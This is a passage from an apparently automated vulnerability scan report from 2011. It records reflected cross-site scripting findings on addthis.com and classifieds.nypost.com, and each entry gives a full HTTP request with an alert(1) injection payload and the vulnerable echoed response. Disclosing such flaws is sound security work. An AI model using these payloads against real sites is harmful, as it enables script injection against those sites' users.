The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e047c"style%3d"x%3aexpression(alert(1))"02571eca9de was submitted in the v parameter. This input was echoed as e047c"style="x:expression(alert(1))"02571eca9de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250e047c"style%3d"x%3aexpression(alert(1))"02571eca9de&username=starbucks&url=http://www.starbucks.com/smooth HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 05:31:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 93836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="source" name="source" value="bkm-250e047c"style="x:expression(alert(1))"02571eca9de" />
...[SNIP]...

1.120. http://www.addthis.com/help/api-spec [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /help/api-spec

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f44e"-alert(1)-"ddd92bfa15c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1f44e"-alert(1)-"ddd92bfa15c/api-spec HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:29:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=67apvckijqd1n3dakhe47gj2v3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1491
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/1f44e"-alert(1)-"ddd92bfa15c/api-spec";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker =
...[SNIP]...

1.121. http://www.addthis.com/help/api-spec [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /help/api-spec

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ca3d4<script>alert(1)</script>6cf201a68e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca3d4<script>alert(1)</script>6cf201a68e3/api-spec HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:29:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=qhq4ppcjjjl2bsbdltnemiu286; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1517
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>ca3d4<script>alert(1)</script>6cf201a68e3/api-spec</strong>
...[SNIP]...

1.122. http://www.addthis.com/help/api-spec [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /help/api-spec

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ae90"-alert(1)-"75ea719bdbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /help/3ae90"-alert(1)-"75ea719bdbc HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 02:29:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=3opilfmv6jbpkpmnnl0eimkdo3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mouser=cl; expires=Thu, 10-Mar-2011 02:29:07 GMT; path=/
Vary: Accept-Encoding
imagetoolbar: no
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 13227

   
   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>AddThis - He
...[SNIP]...
<script type="text/javascript">
var u = "/404/help/3ae90"-alert(1)-"75ea719bdbc";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.123. http://www.classifieds.nypost.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b59"><script>alert(1)</script>77953b7e1b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?56b59"><script>alert(1)</script>77953b7e1b6=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:31:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=255a3ec63add34e23ab755c3f6c4629c; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=a970c04805fa35927fbfe1ae2885bae2; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BMUYxMzAyMDRENTBBQjA0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjI5Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/?56b59"><script>alert(1)</script>77953b7e1b6=1" />
...[SNIP]...

1.124. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17416"-alert(1)-"93c06369d93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing17416"-alert(1)-"93c06369d93/rent/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:13 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=b0fb135493699c46be397d18ce480f53; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=b67f3e84c70532592b61bdc82670e8ff; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BRDA3RTVDRTRENTBBQjJE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzMzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing17416"-alert(1)-"93c06369d93/rent/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.125. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 787a0"><script>alert(1)</script>939c43a6910 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing787a0"><script>alert(1)</script>939c43a6910/rent/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:13 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=09aa001fc39530364a26f37b52cd4f0f; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=0c409366fcf638731c51c1f5013fd790; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1ERDk0OUEwNjRENTBBQjJE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzMzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing787a0"><script>alert(1)</script>939c43a6910/rent/" />
...[SNIP]...

1.126. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 628b8"-alert(1)-"959f4c4a5eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing/rent628b8"-alert(1)-"959f4c4a5eb/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:19 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=dab3bbbe5cc49116e0ff796dec2beddb; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=c92e4eb35e8ac0c1594a8106715c765e; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BNDE3NTMxNTRENTBBQjMz; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzOTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing/rent628b8"-alert(1)-"959f4c4a5eb/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.127. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5d45"><script>alert(1)</script>91ce77e36d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing/rentf5d45"><script>alert(1)</script>91ce77e36d2/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=f71e3c13c8b2a4cbb7187684e907c962; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=1ce0df756b7d35d426f19249f48a1e8e; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BNTBFNDJDRTRENTBBQjMy; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing/rentf5d45"><script>alert(1)</script>91ce77e36d2/" />
...[SNIP]...

1.128. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98452"-alert(1)-"777efafcfa1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing98452"-alert(1)-"777efafcfa1/rent/apartment/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=92afa041b3ea2471b6a3571b6b151996; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=95127b5a9b8f19ca470fccd840497fc4; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BMDRFQjdDODRENTBBQjMy; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing98452"-alert(1)-"777efafcfa1/rent/apartment/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.129. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 851ae"><script>alert(1)</script>1c7a28410d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing851ae"><script>alert(1)</script>1c7a28410d9/rent/apartment/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:17 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=9a1ec2d606ef9a4217b314b63ce5e085; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=5cebecd73600e2dc6b8c1976837b347a; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1CQjNCREM4MDRENTBBQjMx; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzNzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing851ae"><script>alert(1)</script>1c7a28410d9/rent/apartment/" />
...[SNIP]...

1.130. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b443f"><script>alert(1)</script>8c392b4b01f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing/rentb443f"><script>alert(1)</script>8c392b4b01f/apartment/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=bcadb1d7fe1457d766d3a1b415f427ce; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=ac590ce48349d97c6bd214da4ec048ae; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1DOEVEQTAxQjRENTBBQjM2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing/rentb443f"><script>alert(1)</script>8c392b4b01f/apartment/" />
...[SNIP]...

1.131. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c600f"-alert(1)-"631c9dfd9db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing/rentc600f"-alert(1)-"631c9dfd9db/apartment/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:23 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=5482e30b7b9520e50113f93adb559204; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=155c1216dec18cdafb4a8da22a88354e; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1CMDQ4Nzk5RTRENTBBQjM3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing/rentc600f"-alert(1)-"631c9dfd9db/apartment/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.132. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/sale/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b58ca"-alert(1)-"8e650569f43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housingb58ca"-alert(1)-"8e650569f43/sale/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:13 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=8952cebcccddb05b0b492258310e65a7; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=331826cc99afffbcfd3192501f85945d; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BMTRFMDhGMzRENTBBQjJE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
